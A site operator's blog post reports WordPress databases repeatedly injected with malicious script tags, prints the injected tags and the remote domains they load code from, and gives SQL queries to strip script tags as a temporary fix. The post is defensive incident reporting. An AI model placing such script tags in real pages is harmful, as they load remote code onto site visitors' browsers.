Repeated SQL Injection: Malicious Javascript in post_content column [ fix ]

Last updated: October 15 2019

Recently I’m dealing with a repeated contamination, having post_content column injected with malicious Javascript code ( wp_posts -> post_content ).
So far only two sites I manage are affected. Both are hosted by tsohost.com ( Paragon Internet Group Limited ).

After a Google search, I found out more sites with the exact same issue – all hosted by tsoHost.

Malicious scripts found:

<script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
<script data-cfasync=\'false\' type=\'text/javascript\' src=\'//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2\'></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=2574011\" async data-cfasync=\"false\"></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=676630\" async data-cfasync=\"false\"></script>

Several malicious URLs:

pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js
p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2
dolohen.com/apu.php?zoneid=676630
dolohen.com/apu.php?zoneid=2574011
ellcurvth.com/afu.php?zoneid=
ellcurvth.com/afu.php?zoneid=2826294
humsoolt.net/pfe/current/tag.min.js?z=2774009

Aprox. 117 infected web pages are currently indexed by publicwww ).
Another 394 web pages infected with “ellcurvth.com/afu.php?zoneid=2826294“.

A quick temporary fix would be to clear “script” strings from post_content database, using the following SQL query:

UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content, '<script(.*?)>', '')
UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content, '<script(.*?)>((.|\n)*?)<\/script>', '')

Notes:
– backup database before.
– check table prefix and update SQL query if needed.
– if malware returns, switch hosting.

code written by @webartisan.

Need help? Let us clean your site.